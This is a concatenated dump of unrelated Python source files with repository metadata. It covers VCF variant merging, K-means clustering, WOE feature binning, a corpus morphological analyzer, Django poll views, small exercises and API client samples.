varscan_in = bed_include(varscan_ex, inclusion, os.sep.join(( outdir, 'indel.varscan.in.vcf')) )
intermediate_files.add(varscan_in)
else:
varscan_in = varscan_ex
indel_varscan_out = os.sep.join(( outdir, 'indel.varscan.vcf' ))
mod_varscan2.convert(varscan_in, indel_varscan_out)
intermediate_files.add(indel_varscan_out)
indel_intermediates.append(indel_varscan_out)
if jsm:
import vcfModifier.modify_JointSNVMix2 as mod_jsm
if exclusion:
jsm_ex = bed_exclude(jsm, exclusion, os.sep.join(( outdir, 'snv.jsm.ex.vcf')) )
intermediate_files.add(jsm_ex)
else:
jsm_ex = jsm
if inclusion:
jsm_in = bed_include(jsm_ex, inclusion, os.sep.join(( outdir, 'snv.jsm.in.vcf')) )
intermediate_files.add(jsm_in)
else:
jsm_in = jsm_ex
jsm_out = os.sep.join(( outdir, 'snv.jsm.vcf' ))
mod_jsm.convert(jsm_in, jsm_out)
intermediate_files.add(jsm_out)
snv_intermediates.append(jsm_out)
if sniper:
import vcfModifier.modify_SomaticSniper as mod_sniper
if exclusion:
sniper_ex = bed_exclude(sniper, exclusion, os.sep.join(( outdir, 'snv.somaticsniper.ex.vcf')) )
intermediate_files.add(sniper_ex)
else:
sniper_ex = sniper
if inclusion:
sniper_in = bed_include(sniper_ex, inclusion, os.sep.join(( outdir, 'snv.somaticsniper.in.vcf')) )
intermediate_files.add(sniper_in)
else:
sniper_in = sniper_ex
sniper_out = os.sep.join(( outdir, 'snv.somaticsniper.vcf' ))
mod_sniper.convert(sniper_in, sniper_out)
intermediate_files.add(sniper_out)
snv_intermediates.append(sniper_out)
if vardict:
import vcfModifier.modify_VarDict as mod_vardict
if exclusion:
vardict_ex = bed_exclude(vardict, exclusion, os.sep.join(( outdir, 'vardict.ex.vcf')) )
intermediate_files.add(vardict_ex)
else:
vardict_ex = vardict
if inclusion:
vardict_in = bed_include(vardict_ex, inclusion, os.sep.join(( outdir, 'vardict.in.vcf')) )
intermediate_files.add(vardict_in)
else:
vardict_in = vardict_ex
snv_vardict_out = os.sep.join(( outdir, 'snv.vardict.vcf' ))
indel_vardict_out = os.sep.join(( outdir, 'indel.vardict.vcf' ))
mod_vardict.convert(vardict_in, snv_vardict_out, indel_vardict_out)
sorted_snv_vardict_out = os.sep.join(( outdir, 'snv.sort.vardict.vcf' ))
sorted_indel_vardict_out = os.sep.join(( outdir, 'indel.sort.vardict.vcf' ))
vcfsorter(ref, snv_vardict_out, sorted_snv_vardict_out)
vcfsorter(ref, indel_vardict_out, sorted_indel_vardict_out)
for file_i in snv_vardict_out, indel_vardict_out, sorted_snv_vardict_out, sorted_indel_vardict_out:
intermediate_files.add(file_i)
snv_intermediates.append(sorted_snv_vardict_out)
indel_intermediates.append(sorted_indel_vardict_out)
intermediate_vcfs['VarDict']['snv'] = sorted_snv_vardict_out
intermediate_vcfs['VarDict']['indel'] = sorted_indel_vardict_out
if muse:
if exclusion:
muse_ex = bed_exclude(muse, exclusion, os.sep.join(( outdir, 'snv.muse.ex.vcf')) )
intermediate_files.add(muse_ex)
else:
muse_ex = muse
if inclusion:
muse_in = bed_include(muse_ex, inclusion, os.sep.join(( outdir, 'snv.muse.in.vcf')) )
intermediate_files.add(muse_in)
else:
muse_in = muse_ex
muse_out = os.sep.join(( outdir, 'snv.muse.vcf' ))
copy_TextFile.copy(muse_in, muse_out)
intermediate_files.add(muse_out)
snv_intermediates.append(muse_out)
if lofreq_snv:
if exclusion:
lofreq_ex = bed_exclude(lofreq_snv, exclusion, os.sep.join(( outdir, 'snv.lofreq.ex.vcf')) )
intermediate_files.add(lofreq_ex)
else:
lofreq_ex = lofreq_snv
if inclusion:
lofreq_in = bed_include(lofreq_ex, inclusion, os.sep.join(( outdir, 'snv.lofreq.in.vcf')) )
intermediate_files.add(lofreq_in)
else:
lofreq_in = lofreq_ex
snv_lofreq_out = os.sep.join(( outdir, 'snv.lofreq.vcf' ))
copy_TextFile.copy(lofreq_in, snv_lofreq_out)
intermediate_files.add(snv_lofreq_out)
snv_intermediates.append(snv_lofreq_out)
if lofreq_indel:
if exclusion:
lofreq_ex = bed_exclude(lofreq_indel, exclusion, os.sep.join(( outdir, 'indel.lofreq.ex.vcf')) )
intermediate_files.add(lofreq_ex)
else:
lofreq_ex = lofreq_snv
if inclusion:
lofreq_in = bed_include(lofreq_ex, inclusion, os.sep.join(( outdir, 'indel.lofreq.in.vcf')) )
intermediate_files.add(lofreq_in)
else:
lofreq_in = lofreq_ex
indel_lofreq_out = os.sep.join(( outdir, 'indel.lofreq.vcf' ))
copy_TextFile.copy(lofreq_in, indel_lofreq_out)
intermediate_files.add(indel_lofreq_out)
indel_intermediates.append(indel_lofreq_out)
if scalpel:
if exclusion:
scalpel_ex = bed_exclude(scalpel, exclusion, os.sep.join(( outdir, 'indel.scalpel.ex.vcf')) )
intermediate_files.add(scalpel_ex)
else:
scalpel_ex = scalpel
if inclusion:
scalpel_in = bed_include(scalpel_ex, inclusion, os.sep.join(( outdir, 'indel.scalpel.in.vcf')) )
intermediate_files.add(scalpel_in)
else:
scalpel_in = scalpel_ex
scalpel_out = os.sep.join(( outdir, 'indel.scalpel.vcf' ))
copy_TextFile.copy(scalpel_in, scalpel_out)
intermediate_files.add(scalpel_out)
indel_intermediates.append(scalpel_out)
if strelka_snv or strelka_indel:
import vcfModifier.modify_Strelka as mod_strelka
if strelka_snv:
if exclusion:
strelka_ex = bed_exclude(strelka_snv, exclusion, os.sep.join(( outdir, 'snv.strelka.ex.vcf')) )
intermediate_files.add(strelka_ex)
else:
strelka_ex = strelka_snv
if inclusion:
strelka_in = bed_include(strelka_ex, inclusion, os.sep.join(( outdir, 'snv.strelka.in.vcf')) )
intermediate_files.add(strelka_in)
else:
strelka_in = strelka_ex
snv_strelka_out = os.sep.join(( outdir, 'snv.strelka.vcf' ))
mod_strelka.convert(strelka_in, snv_strelka_out)
intermediate_files.add(snv_strelka_out)
snv_intermediates.append(snv_strelka_out)
if strelka_indel:
if exclusion:
strelka_ex = bed_exclude(strelka_indel, exclusion, os.sep.join(( outdir, 'indel.strelka.ex.vcf')) )
intermediate_files.add(strelka_ex)
else:
strelka_ex = strelka_snv
if inclusion:
strelka_in = bed_include(strelka_ex, inclusion, os.sep.join(( outdir, 'indel.strelka.in.vcf')) )
intermediate_files.add(strelka_in)
else:
strelka_in = strelka_ex
indel_strelka_out = os.sep.join(( outdir, 'indel.strelka.vcf' ))
mod_strelka.convert(strelka_in, indel_strelka_out)
intermediate_files.add(indel_strelka_out)
indel_intermediates.append(indel_strelka_out)
if tnscope:
import vcfModifier.modify_MuTect2 as mod_mutect2
if exclusion:
tnscope_ex = bed_exclude(tnscope, exclusion, os.sep.join(( outdir, 'tnscope.ex.vcf')) )
intermediate_files.add(tnscope_ex)
else:
tnscope_ex = tnscope
if inclusion:
tnscope_in = bed_include(tnscope_ex, inclusion, os.sep.join(( outdir, 'tnscope.in.vcf')) )
intermediate_files.add(tnscope_in)
else:
tnscope_in = tnscope_ex
snv_tnscope_out = os.sep.join(( outdir, 'snv.tnscope.vcf' ))
indel_tnscope_out = os.sep.join(( outdir, 'indel.tnscope.vcf' ))
mod_mutect2.convert(tnscope_in, snv_tnscope_out, indel_tnscope_out, True)
for file_i in snv_tnscope_out, indel_tnscope_out:
intermediate_files.add( file_i )
snv_intermediates.append(snv_tnscope_out)
indel_intermediates.append(indel_tnscope_out)
intermediate_vcfs['TNscope']['snv'] = snv_tnscope_out
intermediate_vcfs['TNscope']['indel'] = indel_tnscope_out
# Combine SNV/INDEL variant candidates
snv_combined = os.sep.join(( outdir, 'unsorted.CombineVariants.snv.vcf' ))
indel_combined = os.sep.join(( outdir, 'unsorted.CombineVariants.indel.vcf' ))
getUniqueVcfPositions.combine(snv_intermediates, snv_combined)
getUniqueVcfPositions.combine(indel_intermediates, indel_combined)
for file_i in snv_combined, indel_combined:
intermediate_files.add( file_i )
# Sort them:
snv_combined_sorted = os.sep.join(( outdir, 'CombineVariants.snv.vcf' ))
indel_combined_sorted = os.sep.join(( outdir, 'CombineVariants.indel.vcf' ))
vcfsorter(ref, snv_combined, snv_combined_sorted)
vcfsorter(ref, indel_combined, indel_combined_sorted)
if not keep_intermediates:
for file_i in intermediate_files:
subprocess.call( ('rm', '-v', file_i ) )
return snv_combined_sorted, indel_combined_sorted, intermediate_vcfs, intermediate_files
| [
"[email protected]"
] | |
b6bdc8f40c3a821677c921ecff412bb789fb3fa1 | 63f702bec4b674da982b793eb5611485c5f174c6 | /K-Means/kmeans.py | e755b601c25de648c4aa0326dc8a7f9fa4feb412 | [] | no_license | sinderoth/Machine-learning | 3783959b538cd1c37fc93c7c5153e35910a5e966 | f0fb3da16d55f659d54a3afe42290a490f59f585 | refs/heads/main | 2023-06-13T07:17:28.173809 | 2021-06-29T19:02:11 | 2021-06-29T19:02:11 | 313,746,974 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,063 | py | import math
import random
import numpy as np
import copy
random.seed(5710414)
class KMeans:
def __init__(self, X, n_clusters, max_iterations=1000, epsilon=0.01, distance_metric="manhattan"):
self.X = X
self.n_clusters = n_clusters
self.distance_metric = distance_metric
self.clusters = []
self.cluster_centers = []
self.epsilon = epsilon
self.max_iterations = max_iterations
def fit(self):
center = []
for i in range(self.n_clusters):
color = ()
color = self.generate_random_color()
center.append(color)
mind = self.findClusterIndex(self.X,center,self.distance_metric)
mind = np.asarray(mind)
eps = center
for i in range(self.max_iterations):
print ("KMeans iteration: "+ str(i+1))
center = []
for j in range(self.n_clusters):
if len(self.X[mind==j])> 0:
average = np.mean(self.X[mind==j],axis=0)
else:
average = (0,0,0)
center.append(average)
mind = self.findClusterIndex(self.X,center,self.distance_metric)
mind = np.asarray(mind)
self.cluster = mind
self.cluster_centers = center
if self.epsilonCheck(center,eps,self.n_clusters,self.epsilon) == True:
print ("Epsilon boundary reached! Halting...")
return
eps = center
print ("Max iterations reached! Halting...")
# predict cluter for given (rgb)
def predict(self, instance):
if instance!=list:
instance = [instance]
a = self.findClusterIndex(instance,self.cluster_centers,self.distance_metric)
return a[0]
# generate random color for initialization of kmeans
def generate_random_color(self):
return int(random.uniform(0, 256)), int(random.uniform(0, 256)), int(random.uniform(0, 256))
# distance between two rgb
def calculateDistance(self,a,b,metric):
result = []
a = np.asarray(a)
b = np.asarray(b)
if metric == "manhattan":
return result
else:
dist = np.linalg.norm(a - b[0,:],axis=1).reshape(-1,1)
for i in range(1,self.n_clusters):
dist = np.append(dist,np.linalg.norm(a - b[i,:],axis=1).reshape(-1,1),axis=1)
return dist
# return cluster indices
def findClusterIndex(self,x,center,metric):
dist = self.calculateDistance(x,center,metric)
ls = np.argmin(dist,axis=1)
return ls
# naive epsilon check for halt
def epsilonCheck(self,c,e,k,epsilon):
for i in range(k):
if math.sqrt( ( (c[i][0]-e[i][0])**2 + (c[i][1]-e[i][1])**2 + (c[i][2]-e[i][2])**2 )) > epsilon:
return False
return True | [
"[email protected]"
] | |
9f97c3870679ef7592e94f1c166d780fd092ecbb | 79b390363bee87a0f112a1890e7c3784a74df5a2 | /feature_selection/add_woe_dynamic.py | 395311eb22a36aca6a4d0b6477fa51f0403d9707 | [] | no_license | hbwzhsh/machine_model | 12194599c1385c078a8f8828c293040f835eb14a | 8e6151492898691b48a2c3b240880fabe41d155b | refs/heads/master | 2021-05-12T03:20:14.329296 | 2016-09-06T08:40:46 | 2016-09-06T08:40:46 | 117,614,763 | 1 | 0 | null | 2018-01-16T01:28:22 | 2018-01-16T01:28:22 | null | UTF-8 | Python | false | false | 2,552 | py | #-*- coding: utf-8 -*-
import pandas as pd
import numpy as np
#可以动态处理区间为0的情况IV计算函数
#dataframe是包含‘y’和‘pivot_table‘专门计数的列的
#如果series_1的索引是区间形式,则dataframe的特征的值列也是化为区间形势的特征值,这样才能计算
def add_woe_dynamic(dataframe, series_1, series_0, feature_name):
temp = pd.DataFrame(series_1).copy()
temp['woe'] = 0
total_1 = series_1.sum()
total_0 = series_0.sum()
length = len(series_1)
j = 0
index_list = []
while j <= length-1:
if series_1.iloc[j] == 0 and series_0.iloc[j] != 0:
sub_index = []
while j<=length-1:
sub_index.append(series_1.index[j])
if series_1.iloc[j] != 0:
break
j += 1
index_list.append(sub_index)
j += 1
elif series_1.iloc[j] != 0 and series_0.iloc[j] == 0:
sub_index = []
while j<=length-1:
sub_index.append(series_1.index[j])
if series_0.iloc[j] != 0:
break
j += 1
index_list.append(sub_index)
j += 1
elif series_1.iloc[j] == 0 and series_0.iloc[j] == 0:
sub_index = []
while j<=length-1:
sub_index.append(series_1.index[j])
if series_1.iloc[j] != 0 and series_0.iloc[j] != 0:
break
j += 1
index_list.append(sub_index)
j += 1
else :
index_list.append([series_1.index[j]])
j += 1
if len(index_list)>=3:
if series_1[index_list[-1]].sum() == 0 or series_0[index_list[-1]].sum() == 0:
temp = index_list.pop()
index_list[-1].extend(temp)
if len(index_list)==1:
print 'woe_error'
return 0
if len(index_list)==2:
if series_1[index_list[-1]].sum() == 0 or series_0[index_list[-1]].sum() == 0:
print 'woe_error'
return 0
for i in index_list:
good = series_1[i].sum()*1.0/total_1
bad = series_0[i].sum()*1.0/total_0
temp.loc[i,'woe'] = np.log(good/bad)
#woe保存到文件
with open('/home/jinzitian/machine_model/data/%s_woe'%feature_name,'w') as a:
a.write(str({temp.index[i]:temp['woe'].iloc[i] for i in range(len(temp['woe']))}))
dataframe[feature_name + '_woe'] = dataframe[feature_name].map(lambda x:temp['woe'].loc[x])
| [
"[email protected]"
] | |
3234a40720adb1820739571e807eb92f143a513b | df100eb20af5b2be0b0642cfd7fd02958497de0a | /convertors/simple_convertors/analyzer.py | 6e165e54b214750a21b393e04f2ff1f22a31c218 | [] | no_license | LingConLab/Bashkir_corpus | 2d3c5292c81eea08f2b9ba0f51e724c5b06b31f4 | 2798c0d6498d0aac7c41f44abe73bc7a1e2e618a | refs/heads/master | 2021-06-18T14:33:49.640984 | 2021-01-28T12:24:12 | 2021-01-28T12:24:12 | 157,969,267 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,005 | py | import re
import copy
import os
class DumbMorphParser:
"""
Contains methods that add context-independent word-level
morhological information from a parsed word list to a
collection of JSON sentences. No actual parsing takes
place here.
"""
rxWordsRNC = re.compile('<w>(<ana.*?/(?:ana)?>)([^<>]+)</w>', flags=re.DOTALL)
rxAnalysesRNC = re.compile('<ana *([^<>]+)(?:></ana>|/>)\\s*')
rxAnaFieldRNC = re.compile('([^ <>"=]+) *= *"([^<>"]+)')
rxSplitGramTags = re.compile('[, /=]')
rxHyphenParts = re.compile('[^\\-]+|-+')
rxGlossParts = re.compile('[^ \\-=<>]+')
rxGlossIndexPart = re.compile('^(.*)\\{(.*?)\\}')
def __init__(self, settings, categories, errorLog='errorLog.txt'):
self.settings = copy.deepcopy(settings)
self.categories = copy.deepcopy(categories)
self.rxAllGlosses = self.prepare_gloss_regex()
self.analyses = {}
self.errorLog = errorLog
if ('parsed_wordlist_filename' in self.settings
and len(self.settings['parsed_wordlist_filename']) > 0):
if type(self.settings['parsed_wordlist_filename']) == str:
self.load_analyses(os.path.join(self.settings['corpus_dir'],
self.settings['parsed_wordlist_filename']))
else:
for language in self.settings['parsed_wordlist_filename']:
self.load_analyses(os.path.join(self.settings['corpus_dir'],
self.settings['parsed_wordlist_filename'][language]),
language)
def log_message(self, message):
"""
If the filename of the error log is not empty, append
the message to the file.
"""
if self.errorLog is None or len(self.errorLog) <= 0:
return
try:
fLog = open(self.errorLog, 'a', encoding='utf-8')
fLog.write(message + '\n')
fLog.close()
except:
return
def load_analyses(self, fname, lang=''):
"""
Load parsed word list from a file.
"""
if lang == '':
if 'languages' in self.settings and len(self.settings['languages']) > 0:
lang = self.settings['languages'][0]
else:
lang = self.settings['corpus_name']
self.analyses[lang] = {}
try:
f = open(fname, 'r', encoding='utf-8-sig')
text = f.read()
f.close()
if self.settings['parsed_wordlist_format'] == 'xml_rnc':
self.load_analyses_xml_rnc(text, lang=lang)
except FileNotFoundError:
#fLog = open(self.errorLog, 'a', encoding='utf-8')
print('File not found: ' + fname + '\n')
#fLog.close()
def transform_gramm_str(self, grStr, lang=''):
"""
Transform a string with gramtags into a JSON object.
"""
grJSON = {}
grTags = self.rxSplitGramTags.split(grStr)
for tag in grTags:
if len(tag.strip()) <= 0:
continue
if tag not in self.categories[lang]:
print('No category for a gramtag:', tag, ', language:', lang)
continue
cat = 'gr.' + self.categories[lang][tag]
if cat not in grJSON:
grJSON[cat] = tag
else:
if type(grJSON[cat]) != list:
grJSON[cat] = [grJSON[cat]]
if tag not in grJSON[cat]:
grJSON[cat].append(tag)
return grJSON
def prepare_gloss_regex(self):
"""
Return a regex that finds all glosses.
"""
regexes = {}
for lang in self.settings['languages']:
if lang not in self.categories:
self.categories[lang] = {}
if 'glosses' in self.settings and lang in self.settings['glosses']:
sRegex = '|'.join(re.escape(g) for g in sorted(self.settings['glosses'][lang], key=len))
sRegex = '\\b(' + sRegex + ')\\b'
regexes[lang] = re.compile(sRegex)
else:
sRegex = '|'.join(re.escape(g) for g in sorted(self.categories[lang], key=len))
sRegex = '\\b(' + sRegex + ')\\b'
regexes[lang] = re.compile(sRegex, flags=re.I)
return regexes
def gloss2gr(self, ana, lang):
"""
For an analysis that has glosses, but no tags for inflectional
categories, add these categories.
"""
# TODO: Add rules for translating the glosses into tags.
if 'gloss_index' not in ana:
return
glosses = self.rxAllGlosses[lang].findall(ana['gloss_index'])
for gloss in glosses:
if gloss.lower() in self.categories[lang]:
field = 'gr.' + self.categories[lang][gloss.lower()]
if field not in ana:
ana[field] = gloss.lower()
else:
if type(ana[field]) == str:
ana[field] = [ana[field]]
if gloss.lower() not in ana[field]:
ana[field].append(gloss.lower())
def find_stems(self, glossIndex, lang):
"""
Return all glosses that are not in the categories list, and
therefore are the glosses for the stem.
"""
stems = []
newIndexGloss = ''
for glossPart in glossIndex.split('-'):
if len(glossPart) <= 0:
continue
m = self.rxGlossIndexPart.search(glossPart)
if m is None:
newIndexGloss += glossPart + '-'
continue
gloss, part = m.group(1), m.group(2)
if self.rxAllGlosses[lang].match(gloss) is None:
stems.append((gloss, part))
newIndexGloss += 'STEM{' + part + '}-'
else:
newIndexGloss += glossPart + '-'
return stems, newIndexGloss
def process_gloss_in_ana(self, ana):
"""
If there are fields 'gloss' and 'parts' in the JSON
analysis, add field 'gloss_index' that contains the
glossed word in such a form that it could be queried
with the gloss query language.
Modify the source analysis, do not return anything.
"""
if 'gloss' not in ana or 'parts' not in ana:
return
wordParts = self.rxGlossParts.findall(ana['parts'].replace('{', '(').replace('{', ')'))
glosses = self.rxGlossParts.findall(ana['gloss'])
if len(wordParts) <= 0 or len(glosses) == 0 or len(wordParts) != len(glosses):
self.log_message('Wrong gloss or partitioning: ' + ana['parts'] + ' != ' + ana['gloss'])
return
glossIndex = '-'.join(p[1] + '{' + p[0] + '}'
for p in zip(wordParts, glosses)) + '-'
ana['gloss_index'] = glossIndex
def transform_ana_rnc(self, ana, lang=''):
"""
Transform analyses for a single word, written in the XML
format used in Russian National Corpus, into a JSON object.
"""
setAna = set(self.rxAnalysesRNC.findall(ana.replace('\t', '')))
analyses = []
for ana in setAna:
fields = self.rxAnaFieldRNC.findall(ana)
if len(fields) <= 0:
continue
anaJSON = {}
for k, v in fields:
if k == 'gr':
anaJSON.update(self.transform_gramm_str(v, lang=lang))
else:
anaJSON[k] = v
self.process_gloss_in_ana(anaJSON)
analyses.append(anaJSON)
return analyses
def load_analyses_xml_rnc(self, text, lang=''):
"""
Load analyses from a string in the XML format used
in Russian National Corpus.
"""
if lang == '':
if 'languages' in self.settings and len(self.settings['languages']) > 0:
lang = self.settings['languages'][0]
else:
lang = self.settings['corpus_name']
# there can be several languages if the corpus is parallel
analyses = self.rxWordsRNC.findall(text)
if lang not in self.analyses:
self.analyses[lang] = {}
iAna = 1
print('Loading analyses...')
for ana in analyses:
if iAna % 20000 == 0:
print('Loading analysis #' + str(iAna))
word = ana[1].strip('$&^#%*·;·‒–—―•…‘’‚“‛”„‟"\'')
if len(word) <= 0:
continue
if iAna <= 50000: # We assume the analyses are ordered by word frequency
ana = self.transform_ana_rnc(ana[0], lang=lang)
else:
ana = ana[0] # Avoid huge memory consumption at the expense of time
if word not in self.analyses[lang]:
self.analyses[lang][word] = ana
iAna += 1
print('Analyses for', len(self.analyses[lang]), 'different words loaded.')
def normalize(self, word):
"""
Normalize a word before searching for it in the list of analyses.
"""
return word.strip().lower()
def analyze_word(self, wf, lang=''):
if lang not in self.analyses:
return []
if wf not in self.analyses[lang] and (wf.startswith('-') or wf.endswith('-')):
wf = wf.strip('-')
if wf in self.analyses[lang]:
ana = self.analyses[lang][wf]
if type(ana) == str and self.settings['parsed_wordlist_format'] == 'xml_rnc':
analyses = self.transform_ana_rnc(ana, lang=lang)
else:
analyses = copy.deepcopy(self.analyses[lang][wf])
else:
analyses = []
return analyses
def analyze_hyphened_word(self, words, iWord, lang=''):
"""
Try to analyze a word that contains a hyphen but could
not be analyzed as a whole. Split the word in several,
if needed.
"""
word = words[iWord]
parts = self.rxHyphenParts.findall(word['wf'])
partAnalyses = []
for iPart in range(len(parts)):
if parts[iPart].startswith('-'):
partAnalyses.append(None)
continue
wfPart = self.normalize(parts[iPart])
if iPart > 0:
wfPart = '-' + wfPart
if iPart < len(parts) - 1:
wfPart += '-'
partAna = self.analyze_word(wfPart, lang)
partAnalyses.append(partAna)
if any(pa is not None and len(pa) > 0 for pa in partAnalyses):
offStart = word['off_start']
newWords = [copy.deepcopy(word) for i in range(len(partAnalyses))]
for i in range(len(newWords)):
newWords[i]['wf'] = parts[i]
newWords[i]['off_start'] = offStart
offStart += len(newWords[i]['wf'])
newWords[i]['off_end'] = offStart
if i < len(newWords) - 1:
newWords[i]['next_word'] = iWord + i + 1
else:
newWords[i]['next_word'] += len(newWords) - 1
if newWords[i]['wf'].startswith('-'):
newWords[i]['wtype'] = 'punct'
else:
newWords[i]['ana'] = partAnalyses[i]
words.pop(iWord)
for i in range(len(words)):
if words[i]['next_word'] > iWord:
words[i]['next_word'] += len(newWords) - 1
for i in range(len(newWords)):
words.insert(iWord + i, newWords[i])
# print(words)
return len(newWords) - 1
return 0
def analyze_sentence(self, s, lang=''):
"""
Analyze each word in one sentence using preloaded analyses.
Return statistics.
"""
nTokens, nWords, nAnalyzed = 0, 0, 0
if lang == '':
if 'languages' in self.settings and len(self.settings['languages']) > 0:
lang = self.settings['languages'][0]
else:
lang = self.settings['corpus_name']
if 'words' not in s:
return 0, 0, 0
iWord = -1
while iWord < len(s['words']) - 1:
iWord += 1
nTokens += 1
word = s['words'][iWord]
if word['wtype'] != 'word':
continue
nWords += 1
wf = self.normalize(word['wf'])
analyses = self.analyze_word(wf, lang)
if len(analyses) > 0:
word['ana'] = analyses
nAnalyzed += 1
elif '-' in word['wf']:
iWord += self.analyze_hyphened_word(s['words'], iWord, lang)
return nTokens, nWords, nAnalyzed
def analyze(self, sentences, lang=''):
"""
Analyze each word in each sentence using preloaded analyses.
Return statistics.
"""
nTokens, nWords, nAnalyzed = 0, 0, 0
if lang == '':
if 'languages' in self.settings and len(self.settings['languages']) > 0:
lang = self.settings['languages'][0]
else:
lang = self.settings['corpus_name']
for s in sentences:
nTokensCur, nWordsCur, nAnalyzedCur = self.analyze_sentence(s, lang)
nTokens += nTokensCur
nWords += nWordsCur
nAnalyzed += nAnalyzedCur
return nTokens, nWords, nAnalyzed
| [
"[email protected]"
] | |
765c98c8dd00c1b34bb4f6c1d9611de782fb19f1 | 05da5f5a21ce358f621d12291bee8a1e912319b2 | /madefood/polls/views.py | 16c35f32d140a71a3be272b635ba887ea5a536f4 | [] | no_license | Kamilstepniewski/DjangoProject-Recipe_App | 904ddf31a5ba5754bdc806888b39f9d64b791e81 | 54f78cbbe1a3520624bd96be467dbe429171d706 | refs/heads/master | 2020-05-09T13:40:14.445001 | 2019-04-20T15:29:05 | 2019-04-20T15:29:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 968 | py | from django.shortcuts import get_object_or_404,render
from django.http import HttpResponse
from .models import Poll,Comment
# Create your views here.
def polls_list(request):
recipes = Poll.objects.all()
context = {'recipes': recipes}
return render(request,'polls/recipes.html', context)
def recipes_detail(request,recipes_id):
# return HttpResponse('Youre looking for recipe id:{}'.format(recipes_id))
# recipes = Poll.objects.get(id=recipes_id)
recipes = get_object_or_404(Poll, id=recipes_id)
if request.method == "POST":
print(request.POST)
print("You Posted!!!!")
if request.method == "GET":
print(request.GET)
print("You Get Me")
context = {'recipes': recipes}
return render(request,'polls/recipes_detail.html',context)
def recipes_vote(request,recipes_id):
comment_id = request.POST['comment']
comment = Comment.objects.get(id=comment_id)
comment.votes += 1
comment.save()
return HttpResponse('Recipe Id: {}'.format(recipes_id))
| [
"[email protected]"
] | |
0437d45df3907592b0a10dd025509d6c0f01a063 | cb3753caf27ab53e3dcf187b89a3f58ba93a6562 | /Rotate String.py | b90c4ea458a338c550f1f13262077306c76b3db4 | [] | no_license | robertchengkt/LintCode | dc4d5c14867d66ee21b617ef4ccab218fadc809f | 7f7066d0807654af9b13aa16df2e3b737793af3f | refs/heads/master | 2020-04-15T14:31:06.312510 | 2016-10-29T03:36:06 | 2016-10-29T03:36:06 | 49,547,326 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 417 | py | class Solution:
# @param s: a list of char
# @param offset: an integer
# @return: nothing
def rotateString(self, s, offset):
# write you code here
if offset == 0:
return s
chrList = list(s)
newList = []
i = 0
while i < offset:
newList.append(chrList.pop())
i += 1
newList = newList.append(chrList)
return "".join(newList) | [
"[email protected]"
] | |
2e029ba1eb517c3e91b40586e221617bef7cc79c | ddf89d98c7fa2cfe4a64c5a9796dd06bf0b2b6ca | /test.py | b43c4224965c2b98c2e82198e190cbc6931c15ce | [] | no_license | kgerman84/Test | 855bbcfb7935b72ace9409cb9e0348b90577ded6 | 13e9651ec04a40de98b5a73527e14ea9ea79de33 | refs/heads/master | 2021-01-10T22:47:23.848331 | 2016-10-10T10:29:50 | 2016-10-10T10:29:50 | 70,351,092 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 319 | py | #!/usr/bin/env python
import sys
a1 = int(sys.argv[1])
a2 = int(sys.argv[2])
caunt = 0
for i in range (a1,a2+1):
if ((i%10 + i%100//10 + i%1000//100)
== (i%10000//1000 + i%100000//10000 + i%1000000//100000)):
caunt = caunt + 1
f = open('test.txt', 'w')
f.write(str(caunt))
f.close()
print caunt
| [
"[email protected]"
] | |
3da2c220a49a54cea7eca6b1aa7aff30b2b7c283 | 99dcb18a9e3ea367272f740b8cbf3c34285a0c08 | /samples/generated_samples/aiplatform_generated_aiplatform_v1_tensorboard_service_write_tensorboard_run_data_sync.py | b29147d3fc8c9dc447b2e378c7ab7777942fd231 | [
"Apache-2.0"
] | permissive | googleapis/python-aiplatform | 926a4873f35dbea15b2fd86c0e16b5e6556d803e | 76b95b92c1d3b87c72d754d8c02b1bca652b9a27 | refs/heads/main | 2023-08-19T23:49:02.180075 | 2023-08-19T13:25:59 | 2023-08-19T13:27:27 | 298,017,988 | 418 | 240 | Apache-2.0 | 2023-09-14T21:08:33 | 2020-09-23T15:43:39 | Python | UTF-8 | Python | false | false | 1,814 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for WriteTensorboardRunData
# NOTE: This snippet has been automatically generated for illustrative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
# python3 -m pip install google-cloud-aiplatform
# [START aiplatform_generated_aiplatform_v1_TensorboardService_WriteTensorboardRunData_sync]
from google.cloud import aiplatform_v1
def sample_write_tensorboard_run_data():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
time_series_data = aiplatform_v1.TimeSeriesData()
time_series_data.tensorboard_time_series_id = "tensorboard_time_series_id_value"
time_series_data.value_type = "BLOB_SEQUENCE"
request = aiplatform_v1.WriteTensorboardRunDataRequest(
tensorboard_run="tensorboard_run_value",
time_series_data=time_series_data,
)
# Make the request
response = client.write_tensorboard_run_data(request=request)
# Handle the response
print(response)
# [END aiplatform_generated_aiplatform_v1_TensorboardService_WriteTensorboardRunData_sync]
| [
"[email protected]"
] | |
57485776a4ffeae26eb959d8100093431ae0bddf | 5152422abf6208bf631bc3322f4491e5589c1ee0 | /volttron/SolarAgent/solaragent/pyowm/stationsapi30/stations_manager.py | 402e54a7017c4f135590b3acc524febf55e9bcc3 | [] | no_license | wietlabs/volttron-optimizer | e74fc3e53176b4130a1b1c31ec9a393cd404e94c | 0c06db6842209d5a9b58ba5a76c04a3764f626e9 | refs/heads/master | 2022-11-08T19:27:07.450103 | 2020-06-17T17:57:28 | 2020-06-17T17:57:28 | 268,601,158 | 0 | 0 | null | 2020-06-17T11:10:19 | 2020-06-01T18:29:48 | Python | UTF-8 | Python | false | false | 10,995 | py | """
Object that can read/write meteostations metadata and extract related
measurements
"""
from pyowm.commons.http_client import HttpClient
from pyowm.stationsapi30.parsers.station_parser import StationParser
from pyowm.stationsapi30.parsers.aggregated_measurement_parser import AggregatedMeasurementParser
from pyowm.stationsapi30.uris import STATIONS_URI, NAMED_STATION_URI, MEASUREMENTS_URI
from pyowm.constants import STATIONS_API_VERSION
class StationsManager(object):
